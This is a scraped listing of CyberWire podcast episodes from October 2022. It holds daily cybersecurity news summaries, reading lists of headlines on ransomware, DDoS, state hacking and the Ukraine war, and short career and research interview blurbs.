    Government urged to investigate report Liz Truss’s phone was hacked (the Guardian)

    Ministers creating ‘wild west’ conditions with use of personal phones (the Guardian)

    Suella Braverman admits sending official documents to personal email six times (The Telegraph)

    Ukraine War: UK reveals £6m package for cyber defence (BBC News)

    DNS Threat Report — Q3 2022 (Akamai)


    Copper smelter hit with malware. Notes from the hybrid war. Disinformation, not direct manipulation of results, the principal threat to US elections. Ransomware in Australia’s ForceNet. Threat trends. Oct 31, 2022

    Leading European metals producer is hit with malware. Cooperative defense in cyberspace. A Ukrainian ally describes its exposure to Russian cyberattacks. Former UK Prime Minister Truss's phone may have been compromised. CISA sees a complex threat environment, but no specific threat to US elections. The Australian Defence network sustains a ransomware attack. The three finalists in the DataTribe Challenge share insights on the competition. Rick Howard previews the new season of CSO Perspectives. And a look at threat trends.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/209


    Selected reading.

    Aurubis says it was hit in wider cyberattack on metals industry (Reuters)

    Copper Giant Aurubis Shuts Down Systems Due to Cyberattack (SecurityWeek)

    Inside a US military cyber team’s defence of Ukraine (BBC News)

    Ukraine's cyber power shows value of public-private partnership (Nikkei Asia)

    Latvian President: Only the West’s Weakness Can Provoke Russia (Foreign Policy)

    Latvia’s cyberspace faces new challenges amid war in Ukraine (The Record by Recorded Future)

    Worries build about winter cyber threats in Ukraine (POLITICO)

    Liz Truss's personal phone hacked by Putin's spies (Mail Online)

    Truss phone was hacked by suspected Putin agents when she was foreign minister, the Daily Mail reports (Reuters)

    Liz Truss phone hack claim prompts calls for investigation (BBC News)

    Russian spies hacked Truss's personal phone (Computing)

    Government urged to investigate report Liz Truss’s phone was hacked (the Guardian)

    Ministers creating ‘wild west’ conditions with use of personal phones (the Guardian)

    'Complex threat environment' ahead of midterm elections, top cybersecurity official says (Reuters)

    CISA chief sees no "specific or credible threats" to election infrastructure (CBS News)

    For cyber experts, disinformation overshadows cyberthreats in midterms (Washington Post)

    Australian Defence Department caught up in ransomware attack (ABC)

    Cyber-attack on Australian defence contractor may have exposed private communications between ADF members (the Guardian)

    Cyber Threat Reports (Deep Instinct)

    Deep Instinct releases its 2022 Interim Cyber Threat Study. (CyberWire)


    Jenny Brinkley: A cybersecurity rollercoaster. [Security] [Career Notes] Oct 30, 2022

    Jenny Brinkley, Director of AWS Security at Amazon Web Services (AWS), sits down to share her empowering story of working through the ranks, and even co-founding her own company. While she did not have a typical upbringing for the industry, she credits her parents for where she ended up, as they told her that she could do anything, and as she was growing up she decided that she could. She had the opportunity to co-found a small startup before selling it to AWS. She says that working in her position is like a rollercoaster, as no one thing is like the other, and her highs are high and her lows are low. As a woman in cybersecurity, she is working to empower more women in the field. Jenny says, "I think that we're living in such an interesting time where empathy, kindness, compassion, honesty, partnership in the security space, I mean, heck for any industry, but really for security and cyber security roles today, it's, it's the life blood and to be underestimated, especially as a female or because, you know, my background doesn't follow a cookie cutter pattern of what individuals think of when they think of individuals in security roles." We thank Jenny for sharing her story.


    Bugs and working from home. [Research Saturday] Oct 29, 2022

    Fede Kirschbaum from Faraday Security sits down with Dave to discuss their research on "A vulnerability in Realtek's SDK for eCos OS: pwning thousands of routers." The team at Faraday found a vulnerability, rated high severity, that made it to DEFCON 30. With more and more people working from home for their companies, the research team went looking for vulnerabilities in the equipment employees rely on while working from home.

    The research states that the team was "seeking and reporting security vulnerabilities in IoT devices, which led to the finding of an exploitable bug in a consumer-grade router popular in Argentina." The research also notes that things escalated quickly, and it shares why protecting home networks is important while working remotely.

    The research can be found here:

    • A vulnerability in Realtek's SDK for eCos OS: pwning thousands of routers

    Another DDoS attack against NATO governments. The US 2022 National Defense Strategy is out. Notes on ICS security. Oct 28, 2022

    Cyberattacks against Poland’s and Slovakia’s parliaments. The US 2022 National Defense Strategy is out. Insights from SecurityWeek’s ICS Cyber Security Conference. The importance of zero-trust in industrial environments. Malek Ben Salem from Accenture on machine language security and safety. Our guest is Nick Schneider of Arctic Wolf to discuss why he believes 2023 will see a resurgence of ransomware. And CISA issues four more ICS Advisories.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/208


    Selected reading.

    Computer networks of parliaments in Poland and Slovakia paralyzed by cyberattacks (Euro Weekly News)

    Slovak, Polish Parliaments Hit By Cyber Attacks (Barron's)

    Slovak parliament suspends voting due to suspected cyberattack (Reuters)

    "Also from Russia" - cyber attack on parliaments in Poland and Slovakia (Today Times Live)

    2022 National Defense Strategy (US Department of Defense)

    2022 NDS Fact Sheet | Integrated Deterrence (US Department of Defense)

    Discussing cyberattacks vs system failures. (CyberWire)

    Zero-trust in ICS environments. (CyberWire)

    SANS 2022 Survey: The State of OT/ICS Cybersecurity in 2022 and Beyond (Nozomi Networks)

    CISA Releases Four Industrial Control Systems Advisories (CISA)


    The Malware Mash! [Bonus] Oct 28, 2022

    Enjoy this CyberWire classic.

    They did the Mash...they did the Malware Mash...


    CISA releases voluntary CPGs. Trojans and scanners. Cyber venture investing, and some insights into corporate culture. "Opportunistic" cyberops in a hybrid war. Oct 27, 2022

    CISA releases cross-sector cybersecurity performance goals. Trojans are spreading through scanners. Cyber seed rounds are an exception to a general downtrend in venture investment. Whistleblowing and corporate culture. Storing enterprise secrets. Robert M. Lee from Dragos explains the TSA Pipeline Security Directive. Our guests are Jenny Brinkley from Amazon AWS and Lisa Plaggemier from the National Cybersecurity Alliance with a collaborative educational project. Cyberattacks seen as opportunistic and disconnected from strategy.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/207


    Selected reading.

    Cross-Sector Cybersecurity Performance Goals (CISA)

    CISA unveils voluntary cybersecurity performance goals (Federal News Network)

    Sending Trojans via Scanners (Avanan)

    DataTribe Insights - Q2 2022: Economic Storm Makes Landfall (DataTribe)

    Ukraine: Russian cyber attacks aimless and opportunistic (SearchSecurity)


    Amid widespread unrest, Sudan shutters its Internet. A new PRC influence campaign targets US elections. Software supply chain security. And cybercrime in wartime. Oct 26, 2022

    Sudan closes its Internet as the country sees protests on the first anniversary of a coup. A Chinese influence campaign targets US elections. A software supply chain security study, and a look at vulnerability scanning tools. Documenting cyber war crimes in Ukraine. CISA issues eight ICS Advisories. Andrea Little Limbago from Interos on the effects of water scarcity on data centers. And if you’ll indulge us, we’ve got some pretty exciting CyberWire news.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/206


    Selected reading.

    Internet is shut down in Sudan on anniversary of military coup (The Record by Recorded Future)

    Pro-PRC DRAGONBRIDGE Influence Campaign Leverages New TTPs to Aggressively Target U.S. Interests, Including Midterm Elections (Mandiant)

    Rezilion Vulnerability Scanner Benchmark Report Finds Top Scanners Only 73% Accurate (PR Newswire)

    Four in Five Software Supply Chains Exposed to Cyberattack in the Last 12 Months (BlackBerry)

    Ukraine Documenting Russian Hacks, Eyeing International Charges (Bloomberg)

    CISA Releases Eight Industrial Control Systems Advisories (CISA)


    US Department of Justice unseals three indictments in PRC spying cases. CERT-UA warns of Cuba ransomware phishing. Varonis discovers Windows vulnerabilities. CISA expands KEV Catalog. Oct 25, 2022

    US Department of Justice unseals three indictments in PRC spying cases. CERT-UA warns of Cuba ransomware group phishing campaign. Varonis discovers two Windows vulnerabilities. Mr Security Answer Person John Pescatore on security through obscurity. Ben Yelin on the DOJ’s spying cases against China. CISA expands its Known Exploited Vulnerabilities Catalog with six new entries.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/205


    Selected reading.

    Two Arrested and 13 Charged in Three Separate Cases for Alleged Participation in Malign Schemes in the United States on Behalf of the Government of the People’s Republic of China (US Department of Justice)

    U.S. Justice Department Fires Warning Shot at Chinese Spies (Foreign Policy)

    Chinese spies charged with trying to thwart Huawei investigation (Quartz)

    DOJ Charges 13 Over Chinese Interference In US Affairs (Law360)

    U.S. Says Chinese Tried to Obstruct Huawei Prosecution (Wall Street Journal)

    U.S. charges Chinese nationals with schemes to steal info, punish critics and recruit spies (CBS News)

    Cuba ransomware affiliate targets Ukrainian govt agencies (BleepingComputer)

    Unattributed RomCom Threat Actor Spoofing Popular Apps Now Hits Ukrainian Militaries (BlackBerry)

    The Logging Dead: Two Event Log Vulnerabilities Haunting Windows (Varonis)

    CISA Adds Six Known Exploited Vulnerabilities to Catalog (CISA)


    US unseals cases against PRC intelligence officers. Daixin ransomware is an active threat. FBI warns of Iranian threat group. Iran’s nuclear agency discloses hack. Hybrid war and threats to infrastructure. Oct 24, 2022

    Breaking: US unseals three cases against Chinese intelligence officers. CISA says Daixin Team ransomware is an active threat. The FBI warns of Iranian threat group's activity. Meanwhile, the Iranian nuclear agency says its email was hacked. Norway is concerned about threats to oil and gas infrastructure. A drop in ransomware correlates with Russia's hybrid war. Ann Johnson from Afternoon Cyber Tea speaks with AJ Yawn from ByteChek about breaking into the cybersecurity industry. Josh Ray from Accenture describes threats to the satellite industry. And cyber offense may be proving harder than thought.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/204


    Selected reading.

    CISA Alert AA22-294A – #StopRansomware: Daixin Team. (CyberWire)

    #StopRansomware: Daixin Team (CISA)

    CISA Warns of Daixin Team Hackers Targeting Health Organizations With Ransomware (The Hacker News)

    Iranian Cyber Group Emennet Pasargad Conducting Hack-and-Leak Operations Using False-Flag Personas (FBI)

    FBI warns Iranian hackers active ahead of the U.S. midterms (NBC News)

    FBI Warns of Attacks From Iranian Threat Group Emennet Pasargad (Decipher)

    Iran Hackers Behind Attempt on US Election Are Still Active (Gov Info Security)

    FBI warns of ‘hack-and-leak’ operations from group based in Iran (The Record by Recorded Future)

    Iran's Atomic Energy Agency Says Its E-Mail Server Was Hacked (RadioFreeEurope/RadioLiberty)

    Iran says ‘specific foreign country’ behind hacktivist leak of atomic energy emails (The Record by Recorded Future)

    Iran’s Top Nuclear Agency Says Its Email Servers Were Hacked (Bloomberg)

    Ukraine Could Still Face Cyberattacks, Experts Say (CNET)

    Fears over Russian threat to Norway's energy infrastructure (AP NEWS)

    Norway PM: Russia poses ‘real and serious’ cyber threat to oil and gas industry (The Record by Recorded Future)

    Ukraine war cuts ransomware as Kremlin co-opts hackers (The Telegraph)

    Q&A: Kenneth Geers on the cyber war between Ukraine and Russia (The Record by Recorded Future)


    CISA Alert AA22-294A – #StopRansomware: Daixin Team. [CISA Cybersecurity Alerts] Oct 24, 2022

    FBI, CISA, and Department of Health and Human Services are releasing this joint advisory to provide information on the Daixin Team, a cybercrime group that is actively targeting U.S. businesses, predominantly in the Healthcare and Public Health Sector.

    AA22-294A Alert, Technical Details, and Mitigations

    Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.

    Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.

    Ongoing Threat Alerts and Sector alerts are produced by the Health Sector Cybersecurity Coordination Center (HC3) and can be found at hhs.gov/HC3

    For additional best practices for Healthcare cybersecurity issues see the HHS 405(d) Aligning Health Care Industry Security Approaches at 405d.hhs.gov

    CISA offers several no-cost scanning and testing services to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. See www.cisa.gov/cyber-hygiene-services

    U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

    To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.


    Megan Doherty: Conquer barriers in the workforce. [Technical Specialist] [Career Notes] Oct 23, 2022

    Megan Doherty, a Technical Specialist from Microsoft Canada, sits down to share her story of overcoming barriers in the workforce to get to where she is today in her career. Megan started out as a mechanical engineer before making the switch to do something with more creativity and problem solving. She shares her passion for working with a group Microsoft created called "DigiGirlz," as well as for working with her team, who she says helps her face the adversity she encounters in her career. Megan said "There's so many barriers, just even mentally that we put on ourselves when it comes to looking for a career change or even thinking of cybersecurity as your next career path." She hopes to leave a legacy of kindness and compassion behind, especially in the industry she works in. We thank Megan for sharing her story with us.


    New tools target governments in Middle East? [Research Saturday] Oct 22, 2022

    Dick O'Brien from Symantec's Threat Hunter team sits down with Dave to discuss their work on "Witchetty - Group Uses Updated Toolset in Attacks on Governments in Middle East." Their research has found that the group known as Witchetty (aka LookingFrog) has been progressively updating its toolset, including a new backdoor Trojan (Backdoor.Stegmap), to launch malware attacks on targets in the Middle East and Africa.

    The research states "The attackers exploited the ProxyShell and ProxyLogon vulnerabilities to install web shells on public-facing servers before stealing credentials, moving laterally across networks, and installing malware on other computers." The researchers describe more on the new tool being used and why this new group is a threat.

    The research can be found here:

    • Witchetty: Group Uses Updated Toolset in Attacks on Governments in Middle East

    Blackbyte's new exfiltration tool. Hijacking student accounts for BEC. Zhora calls Russia's cyber campaigns a failure. OldGremlin ransomware is an outlier. Oct 21, 2022

    Blackbyte's new exfiltration tool. Hijacking student accounts for BEC. Zhora calls Russia's cyber campaigns a failure. Caleb Barlow explores new thinking for incident response. Our guest is Jon Hencinski of Expel, tracking the latest threat trends. OldGremlin ransomware is an outlier.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/203


    Selected reading.

    Exbyte: BlackByte Ransomware Attackers Deploy New Exfiltration Tool (Symantec)

    Hijacking Student Accounts to Launch BEC-Style Attacks (Avanan)

    This sneaky kind of cybercrime rules them all (Washington Post)

    Russia Failing to Reach Cyber War Goals, Ukrainian Official Says (Meritalk)

    EU supports cybersecurity in Ukraine with over €10 million - EU NEIGHBOURS east (EU NEIGHBOURS east)

    Gremlins’ prey, secrets, and dirty tricks: the ransomware gang OldGremlin set new records (Group-IB)

    OldGremlin hackers use Linux ransomware to attack Russian orgs (BleepingComputer)

    OldGremlin, which targets Russia, debuts new Linux ransomware (Computing). It is one of the few ransomware groups in the world that prefer to target Russian organisations, but this may change, experts advise.

    More Russian Organizations Feeling Ransomware Pain (Bank Info Security)


    Notes and lessons on the hybrid war. Update on Zimbra exploitation. Microsoft fixes misconfigured storage. The state of the cyber workforce. Trends in phishing and ransomware. Oct 20, 2022

    DDoS as misdirection. NSA shares lessons learned from cyber operations observed in Russia's war against Ukraine. Advice from CISA on Zimbra. A misconfigured Microsoft storage endpoint has been secured. Notes from a study on the cybersecurity workforce. The cost to businesses of phishing. Betsy Carmelite from Booz Allen Hamilton on managing mental health in the cyber workforce. Our guest is Ismael Valenzuela of Blackberry with insights on "The Cyber Insurance Gap". And updates to the ransomware leaderboard.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/202


    Selected reading.

    Bulgarian cyberattack: Sabotage as a cover for spying? (Deutsche Welle)

    Bulgarian websites impacted by Killnet DDoS attack (SC Media)

    Lessons From Ukraine: NSA Cyber Chief Lauds Industry Intel (Meritalk)

    NSA Cybersecurity Director's Six Takeaways From the War in Ukraine (Infosecurity Magazine)

    NSA cyber chief says Ukraine war is compelling more intelligence sharing with industry (CyberScoop)

    Investigation Regarding Misconfigured Microsoft Storage Location (Microsoft Security Response Center)

    2019 Cybersecurity Workforce Study ((ISC)²)

    The Business Cost of Phishing (Ironscales)

    Leading Ransomware Variants Q3 2022 (Intel471)


    Dispatches from the hybrid war, as auxiliaries on both sides skirmish in cyberspace. An Azure vulnerability patched. Trends in ransomware. And Social Security phishbait. Oct 19, 2022

    Killnet explains its actions against Bulgaria's government. The National Republican Army claims successful attacks on Russian companies. The Director of Germany's BSI is out. A vulnerability in Azure, disclosed and patched. Trends in ransomware. Carole Theriault has a fresh look at the ransomware question - to pay or not to pay? Tim Eades from Cyber Mentor Fund considers cyber insurance for small and medium-sized businesses. Social Security phishing.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/201


    Selected reading.

    Cyberattack disrupts Bulgarian government websites over ‘betrayal to Russia’ (The Record by Recorded Future)

    Russians Against Putin: NRA Claims Massive Hack of Russian Government Contractors’ Computers - Kyiv Post - Ukraine's Global Voice (Kyiv Post)

    Germany fires cybersecurity chief after reports of possible Russia ties (Reuters)

    German Cybersecurity Chief Sacked Over Alleged Russia Ties (SecurityWeek)

    German cyber chief suspended following allegation he associated with Russian intelligence (The Record by Recorded Future)

    FabriXss (CVE-2022-35829): How We Managed to Abuse a Custom Role User Using CSTI and Stored XSS in Azure Fabric Explorer (Orca Security)

    Ransomware In Q3 2022 (Digital Shadows)

    Fresh Phish: A New Social Security Phishing Scam Preys Upon Our Biggest Worries (INKY)


    Mobilizing DDoS-as-a-service. Interpol takes down Black Axe gang members. Trends in phishing. Spyder Loader active in Hong Kong. Europol announces arrests in keyless car hacking case. Oct 18, 2022

    Mobilizing DDoS-as-a-service. Interpol takes down the Black Axe gang members. A look at phishing trends. Spyder Loader is active in Hong Kong. Joe Carrigan looks at Google’s launch of passwordless authentication. Our guest is Dr. Eman El-Sheikh from University of West Florida's Center for Cybersecurity on NSA-funded National Cybersecurity Workforce Development Programs. And Europol announces arrests in a case of keyless car hacking.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/200


    Selected reading.

    Project DDOSIA Russia's answer to disBalancer (Radware)

    Russian DDOSIA Project Pays Volunteers to Participate in DDOS Attacks on Western Companies (Gridinsoft Blogs)

    International crackdown on West-African financial crime rings (Interpol)

    Giant online scamming syndicate 'Black Axe' destroyed in Interpol-led operation (teiss)

    INTERPOL-led Operation Takes Down 'Black Axe' Cyber Crime Organization (The Hacker News)

    Operation Jackal: Interpol arrests Black Axe fraud suspects (Register)

    When the Black Axe falls: cybercrime suspects detained in global bust (Cybernews)

    International Police Action Blunts Black Axe Criminal Group - HS Today (Hstoday)

    Q3 2022 Cofense Phishing Intelligence Trends Review (Cofense)

    Spyder Loader: Malware Seen in Recent Campaign Targeting Organizations in Hong Kong (Symantec)

    Operation CuckooBees: Cybereason Uncovers Massive Chinese Intellectual Property Theft Operation (Cybereason)

    31 arrested for stealing cars by hacking keyless tech | Europol (Europol)

    European gang that sold car hacking tools to thieves arrested (The Record by Recorded Future)


    Tata Power sustains cyberattack. Influence operations and battlespace prep. Ransom Cartel looks a lot like REvil. Notes from Russia’s hybrid war. Oct 17, 2022

    There’s been a cyberattack against Tata Power. The FBI warns US state political parties of Chinese scanning. Russian influence ops play defense; China’s are on the offense. Ransom Cartel and a possible connection to REvil. "Prestige" ransomware is sighted in attacks on Polish and Ukrainian targets. Distributed denial-of-service attacks interfere with Bulgarian websites. Grayson Milbourne of OpenText Security Solutions on SBOMs. Our own Rick Howard checks in with Bryan Willett of Lexmark on implementation of Zero Trust. And Mr. Musk tweets his intention to continue to subsidize Starlink for Ukraine (probably).


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/199


    Selected reading.

    Hackers Attack Tata Power IT Systems: All You Need To Know (IndiaTimes)

    Chinese hackers are scanning state political party headquarters, FBI says (Washington Post)

    The Defender's Advantage Cyber Snapshot Issue 2 — More Insights From the Frontlines (Mandiant)

    Ransom Cartel Ransomware: A Possible Connection With REvil (Unit 42)

    New “Prestige” ransomware impacts organizations in Ukraine and Poland (Microsoft Security Threat Intelligence)

    Bulgarian Government Hit By Cyberattack Blamed On Russian Hacking Group (RadioFreeEurope/RadioLiberty)

    'The hell with it': Elon Musk tweets SpaceX will 'keep funding Ukraine govt for free' amid Starlink controversy (CNBC)

    Starlink isn't a charity, but the Ukraine war isn't a business opportunity (TechCrunch)


    Cyber confidence: Knowing what you have and where it is. [CyberWire-X] Oct 16, 2022

    Between multi-cloud deployments, more employees working remotely, and increasing use of SaaS applications, the number of entry points for attackers to infiltrate your systems has exploded. But gaining visibility into all these possible attack vectors is time-consuming and often incomplete or just a snapshot in time.

    If the first rule of cyber is to “know what you have,” how can cyber professionals get a comprehensive, current picture of their assets? How can they feel confident that they understand which assets may be more vulnerable and prioritize defenses accordingly?

    In the first half of this episode of CyberWire-X, the CyberWire's CSO, Chief Analyst, and Senior Fellow, Rick Howard, is joined by Hash Table member Jaclyn Miller, the Head of InfoSec & IT at DispatchHealth. In the second half of the episode, Cody Pierce, Chief Product Officer at episode sponsor LookingGlass Cyber Solutions, talks with Dave Bittner. Listen to the discussions about answering the foundational cyber questions (What do I have? Is it protected?), why context is critical, and how an adversarial perspective helps you be a better defender.


    Amanda Adams: Pivoting into the tech world. [VP] [Career Notes] Oct 16, 2022

    Amanda Adams, VP of Americas Alliances at CrowdStrike, sits down to share her story of how she pivoted into the tech field. She started her career wanting to be involved with sports; after getting her master's degree, Amanda was faced with a difficult choice between working for the Golden State Warriors and Cisco. She ultimately chose Cisco as her path forward and has been working in technology ever since. Now she works for a team where she gets to prove her social skills and is focused on partnerships. She says that working in technology doesn't just have to mean working with technology; there are many other ways you can get involved with the field. Amanda says "you can always pivot into the technology industry and support the broader mission by doing that job function." We thank Amanda for sharing her story.


    Noberus ransomware: evolving tactics. [Research Saturday] Oct 15, 2022

    Brigid O Gorman from Symantec's Threat Hunter team joins Dave to discuss their research on "Noberus Ransomware - Darkside and BlackMatter Successor Continues to Evolve its Tactics." The research states that Noberus ransomware (aka BlackCat, ALPHV) is more dangerous than ever because attackers have been using new tactics, tools, and procedures in recent months.

    In the research, Symantec says, "Among some of the more notable developments has been the use of a new version of the Exmatter data exfiltration tool, and the use of Eamfo, information-stealing malware that is designed to steal credentials stored by Veeam backup software." They also take an in-depth look at how its affiliate program operates.

    The research can be found here:

    • Noberus Ransomware: Darkside and BlackMatter Successor Continues to Evolve its Tactics

    Phishing for poll watchers. Impersonating Intrusion Truth. Data breach at the LDS Church. SpaceX asks for help paying for Ukraine’s Starlink. Killnet’s potential. The gamer’s attack surface. Oct 14, 2022

    County election workers find themselves targets of phishing. Impersonating Intrusion Truth. The LDS Church discloses data compromise. SpaceX asks for Starlink funding. Does Killnet have potential to do more damage than it so far has? Deepen Desai from Zscaler on Joker, Facestealer and Coper banking malware on the Google Play store. Our guest is Maxime Lamothe-Brassard of LimaCharlie to discuss how cybersecurity is following in the footsteps of software engineering. And the Gamers’ attack surface? It’s big, big, really big, Noobs.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/198


    Selected reading.

    2022 Election Phishing Attacks Target Election Workers (Trellix)

    Suspicious Twitter accounts impersonating research group try to blame the NSA for Chinese hacks (The Daily Dot)

    Statement and FAQ on Church Account Data Incident (Church of Jesus Christ of Latter Day Saints)

    Exclusive: Musk's SpaceX says it can no longer pay for critical satellite services in Ukraine, asks Pentagon to pick up the tab (CNN)

    Killnet: don't underestimate the “script kiddies,” experts say (Cybernews)

    Gaming Is Booming. That’s Catnip for Cybercriminals. (New York Times)


    What the cybercriminals are up to: improving their tools and carrying out the same old dreary social engineering. Budworm APT sightings. And the state of Russia’s hybrid war. Oct 13, 2022

    Emotet ups its game. COVID-19 small business grants as phishbait. Google Translate is spoofed for credential harvesting. Research on the Budworm espionage group. Kevin Magee from Microsoft shares why cybersecurity professionals should join company boards. Our guest is Chris Niggel from Okta with a look at identity shortfalls. And Internet outages during missile strikes, and the prospects of Russia’s hybrid war.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/197


    Selected reading.

    Emotet’s evolution. (ESET)

    Fresh Phish: Small Business COVID-19 Grants Designed for Disaster (INKY)

    Spoofing Google Translate to Steal Credentials (Avanan)

    Budworm: Espionage Group Returns to Targeting U.S. Organizations (Symantec Blog)

    Internet outages hit Ukraine following Russian missile strikes (Bitdefender)

    Starlink helped restore energy, communications infrastructure in parts of Ukraine - official (Reuters)

    Ukraine’s Vice PM Thanks Starlink for Help to Restore Connections After Missile Attack from Russia (Tech Times)

    We must tackle Europe’s winter cyber threats head-on (POLITICO)

    The conflict in Ukraine makes us rethink cyberwar (The Japan Times)


    Caffeine in the C2C market. Refund-fraud-as-a-service. Costs of a nuisance. Staying alert during a hybrid war. Renewed Polonium activity. The Uber case's impact on security professionals. Oct 12, 2022

    Refund fraud as a service. Costs of a nuisance. Remaining on alert during a hybrid war. Renewed activity by Polonium. Andrea Little Limbago from Interos discussing quantum computing policy. CyberWire Space Correspondent Maria Varmazis speaks with Dr. Gregory Falco on lessons learned from Russia’s attack on Viasat. Reflections on the Uber case's impact on security professionals. And when it comes to phishing-as-a-service, we’ll take decaf.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/196


    Selected reading.

    The Fresh Phish Market: Behind the Scenes of the Caffeine Phishing-as-a-Service Platform (Mandiant)

    Caffeine phishing. (CyberWire)

    Refund Fraud as a Service (Netacea)

    Amid reports of JP Morgan cyberattack, experts call Killnet unsophisticated, ‘media hungry’ (SC Media)

    Hacktivists Force Companies to Respond to Low-Level Cyberattacks (Wall Street Journal)

    Nato warns Russian sabotage on Western targets 'could trigger Article 5' (The Telegraph)

    US Not Ruling Out Russian Cyber Offensive (VOA)

    Ukraine at D+230: Escalation, but unlikely to be sustainable. (CyberWire)

    POLONIUM targets Israel with Creepy malware (WeLiveSecurity)

    Hacking group POLONIUM uses ‘Creepy’ malware against Israel (BleepingComputer)

    Security chiefs fear ‘CISO scapegoating’ following Uber-Sullivan verdict (The Record)

    Sullivan verdict sends shockwaves through the security industry (Security Info Watch)

    Reflections on the Uber case's impact on security. (CyberWire)


    An update on the hybrid war, where Russia turns to missile strikes, physical sabotage, and nuisance-level DDoS. Surveys look at the state of the SOC and the mind of the CISO. Oct 11, 2022

    Russia's Killnet suspected in DDoS attack on major US airports. Starlink service interruptions reported. Bundesbahn communications network sabotaged in northern Germany. Germany's cybersecurity chief faces scrutiny over alleged ties to Russia. Ben Yelin on the FCC's crackdown on robocalls. Ann Johnson from Afternoon Cyber Tea talking with Sounil Yu from JupiterOne about the importance and evolution of cyber resilience. Overworked CISOs may be a security risk, but in an encouraging counterpoint, another study shows a record of CISO success during the pandemic.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/195


    Selected reading.

    US Airport Websites Hit by Suspected Pro-Russian Cyberattacks (SecurityWeek)

    Hackers knock some U.S. airport websites offline (Washington Post)

    Hackers took down U.S. airport web sites, Department of Homeland Security confirms (USA TODAY)

    Pro-Russian hackers claim responsibility for taking down US airport websites (Computing)

    US airports' sites taken down in DDoS attacks by pro-Russian hackers (BleepingComputer)

    Pro-Putin goons target US airport websites with DDoS flood (Register)

    Russian Sanctions Instigator Lloyd’s Possibly Hit by Cyber-Attack (Infosecurity Magazine)

    Lloyd's of London reboots network after suspicious activity (Register)

    Colorado.gov Back Online After Cyber Attack (GovTech)

    Defending Ukraine: SecTor session probes a complex cyber war (IT World Canada)

    Ukrainian officials reportedly say there have been 'catastrophic' Starlink outages in recent weeks (Business Insider)

    Frontline Ukraine troops are reportedly enduring Starlink outages (Engadget)

    Elon Musk’s foray into geopolitics has Ukraine worried (The Economist)

    Elon Musk needs to clarify Ukraine's reported Starlink outages: Kinzinger (Newsweek)

    Attack on German Rail Network ‘Targeted, Professional,’ Police Say (Bloomberg)

    An act of sabotage shut down parts of Germany's rail system for hours this weekend (NPR.org)

    Germany rail chaos could have been caused by Russia, says MP (The Telegraph)

    Sabotage blamed for major disruption on Germany’s rail network (The Telegraph)

    No sign that foreign state was behind German rail sabotage, police say (Reuters)

    Germany Won’t Rule Out Foreign Country Role in Rail Sabotage (Bloomberg)

    Germany's cybersecurity chief faces dismissal, reports say (Reuters)

    German cybersecurity chief investigated over Russia ties (ABC News)

    German Cybersecurity Chief to be Sacked Over Alleged Russia Ties: Sources (SecurityWeek)

    „Wir müssen wachsam bleiben“ ("We must remain vigilant") (Tagesspiegel)

    1 in 5 Chief Information Security Officers (CISOs) Work More Than 25 Extra Hours Per Week (Tessian)

    2022 Devo SOC Performance Report (Devo)